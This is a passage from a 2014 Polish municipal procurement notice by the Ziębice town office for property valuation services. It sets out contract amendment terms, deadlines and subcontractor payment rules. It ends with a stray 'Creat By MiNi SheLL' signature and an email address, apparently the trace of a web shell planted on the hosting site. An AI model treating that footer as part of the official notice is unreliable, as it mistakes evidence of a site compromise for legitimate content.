4)	zmianę osób zdolnych do wykonania zamówienia pod warunkiem, że nowa osoba będzie posiadała uprawnienia zawodowe w zakresie szacowania nieruchomości oraz uzyskała wpis do centralnego rejestru rzeczoznawców majątkowych zgodnie z przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami dział V (t.j.: Dz. U. z 2014 r. poz. 518) oraz Wykonawca złoży oświadczenie iż osoba które będzie uczestniczyć w wykonaniu zamówienia posiada uprawnienia zawodowe w zakresie szacowania nieruchomości oraz uzyskała wpis do centralnego rejestru rzeczoznawców majątkowych zgodnie z przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami dział V (t.j.: Dz. U. z 2014 r. poz. 518).
5)	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy                 w zakresie zmiany terminu realizacji odrębnych zleceń w sytuacjach spowodowanych warunkami atmosferycznymi uniemożliwiającymi przeprowadzenie rzetelnych oględzin wycenianej lub inwentaryzowanej nieruchomości lub wstrzymania realizacji zlecenia jako następstwa działania osób trzecich w szczególności ich nieobecności lub nieodbierania powiadomień od Wykonawcy.
2.	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
3.	Zamiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze Stron, za zgodą drugiej Strony umowy, na podstawie aneksu do umowy.
4.	Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ziebice.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ziębicach ul. Przemysłowa 10,57-220 Ziębice (pokój nr 20b - II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2014 godzina 10:00, miejsce: Urząd Miejski w Ziębicach ul. Przemysłowa 10, 57-220 Ziębice (pokój nr 10 sekretariat I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	ZAMAWIAJĄCY NIE PRZEWIDUJE ZAWARCIA UMOWY RAMOWEJ
2.	ZAMAWIAJĄCY PRZEWIDUJE UDZIELENIE ZAMÓWIEŃ UZUPEŁNIAJĄCYCH Zamówienia uzupełniające mogą zostać udzielone na podstawie odrębnej umowy w trybie zamówienia z wolnej ręki na podstawie art. 67 ust 1 pkt 6 ustawy Pzp. zamówienia uzupełniające mogą zostać udzielone w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.
3.	ROZLICZENIA BĘDĄ PROWADZONE W WALUCIE PLN
4.	ZAMAWIAJĄCY NIE PRZEWIDUJE AUKCJI ELEKTRONICZNEJ
5.	ZAMAWIAJĄCY NIE PRZEWIDUJE WYMAGAŃ, O KTÓRYCH MOWA W ART. 29 UST. 4 USTAWY PRAWO ZAMÓWIEŃ PUBLICZNYCH
6.	INFORMACJA DOTYCZĄCA UDZIAŁU PODWYKONAWCÓW W PRZEDMIOCIE ZAMÓWIENIA
Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy 
1)	Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, którą zamierza powierzyć podwykonawcom. W przypadku braku takiego oświadczenia Zamawiający uzna, iż wykonawca będzie realizował zamówienie bez udziału podwykonawców.
2)	Wskazanie w ofercie części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom, winno nastąpić poprzez określenie jej rodzaju i zakresu. 
3)	Jeżeli Wykonawca przy realizacji zamówienia będzie współpracować z Podwykonawcami, będą miały zastosowanie niżej wymienione postanowienia:
a)	Wykonawca przedłoży Zamawiającemu do zaakceptowania wniosek o zgodę   na zawarcie umowy z Podwykonawcą wraz ze wzorem projektu umowy.
b)	Projekt umowy/ umowa z Podwykonawcą nie może stać w sprzeczności                                    z postanowieniami SIWZ. 
c)	Termin zapłaty wynagrodzenia Podwykonawcy przewidziany w projekcie umowy / umowie o podwykonawstwo, której przedmiotem są usługi nie może być dłuższy niż 30 dni od dnia doręczenia wykonawcy faktury lub rachunku potwierdzających wykonanie zleconej Podwykonawcy usługi. 
d)	Zamawiający, w terminie 14 dni od przedstawienia mu przez Wykonawcę projektu umowy z Podwykonawcą, zgłasza pisemne zastrzeżenia do projektu umowy  o podwykonawstwo niespełniającej wymagań SIWZ lub gdy przewiduje termin zapłaty wynagrodzenia dłuższy niż termin, o którym mowa w ppkt 5) lit c).
e)	Niezgłoszenie pisemnych zastrzeżeń w terminie 14 dni do przedłożonego projektu umowy o podwykonawstwo, której przedmiotem są usługi, uznaje się za akceptację projektu umowy. 
f)	kopia umowy poświadczona za zgodność z oryginałem z Podwykonawcą winna być dostarczona przez Wykonawcę Zamawiającemu w ciągu 7 dni od daty jej zawarcia,
g)	Zamawiający w terminie 14 dni od przedstawienia mu przez Wykonawcę projektu umowy z podwykonawcą, zgłasza sprzeciw  do umowy o podwykonawstwo, której przedmiotom są usługi niespełniającej wymagań SIWZ lub gdy przewiduje termin zapłaty wynagrodzenia dłuższy niż termin, o którym mowa w ppkt 5) lit c).
h)	Niezgłoszenie pisemnego sprzeciwu  w terminie 14 dni do przedłożonej umowy                  o podwykonawstwo, której przedmiotem są usługi, uznaje się za akceptację umowy
i)	Postanowienia umowy określone w ppkt 5 lit a)-h)  mają zastosowanie do zmian do projektu umowy/ umowy o podwykonawstwo, której przedmiotem są usługi.
4)	Wykonawca do każdej  faktury/rachunku zobowiązany jest dołączyć oświadczenie                            o wyłącznym wykonywaniu zamówienia w siłach własnych lub informację                                    o podwykonawcach, których usługi zostały objęte składaną fakturą, o faktury Wykonawca przedkłada oświadczenia wszystkich podwykonawców o całkowitym uregulowaniu zobowiązań finansowych wynikających z wykonanych usług lub dowody zapłaty, jeśli zapłata była wymagana terminem wynikającym z umowy  o podwykonawstwo.
5)	Wykonawca ponosi skutki ewentualnego zatrzymania płatności przez Zamawiającego,                    z powodu nie dołączenia do faktury w/w oświadczeń własnych, lub Podwykonawców.
6)	W  przypadku, gdy  Wykonawca  nie  dokona  w  całości  lub  w części zapłaty wynagrodzenia Podwykonawcy, w terminie  ustalonym  w  umowie  o  podwykonawstwo,                                       a  Podwykonawca wystąpi z żądaniem zapłaty  wynagrodzenia bezpośrednio przez Zamawiającego i udokumentuje zasadność   żądania   fakturą  (rachunkiem)  oraz   dokumentami  potwierdzającymi wykonanie i odbiór usług objętych fakturą (rachunkiem), Zamawiający  zapłaci  na  rzecz Podwykonawcy  kwotę będącą przedmiotem żądania, zgodnie z treścią zaakceptowanej umowy o podwykonawstwo.
7)	Przed dokonaniem bezpośredniej zapłaty Zamawiający umożliwi Wykonawcy zgłoszenie pisemnych uwag w wyznaczonym terminie dotyczących zasadności zapłaty Podwykonawcy.
8)	W przypadku dokonania bezpośredniej zapłaty podwykonawcy zamawiający potrąca kwotę wypłaconego wynagrodzenia z wynagrodzenia należnego Wykonawcy. 
9)	Bezpośrednia zapłata  dotyczy wyłącznie należności powstałych po zaakceptowaniu przez zamawiającego umowy o podwykonawstwo, której przedmiotem są usługi lub                              po przedłożeniu zamawiającemu poświadczonej za zgodność z oryginałem kopii umowy                o podwykonawstwo, której przedmiotem są usługi oraz obejmuje wyłącznie należne wynagrodzenie bez odsetek należnych Podwykonawcy. 
10)	Wykonawca ponosi wobec Zamawiającego pełną odpowiedzialność za usługi, które wykonuje przy pomocy Podwykonawców.
11)	W przypadku powierzenia wykonania całości lub części przedmiotu umowy Podwykonawcom  Wykonawca odpowiada za ich działania i zaniechania,  przedstawicieli Podwykonawcy lub pracowników w takim zakresie jak za swoje własne.

7. Otwarcie ofert nastąpi w dniu 9 maja 2014 roku o  godz. 10:30 w siedzibie zamawiającego tj. w Urzędzie Miejskim w Ziębicach przy ul. Przemysłowej 10 w Ziębicach, w pokoju nr 2 (sala narad),.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com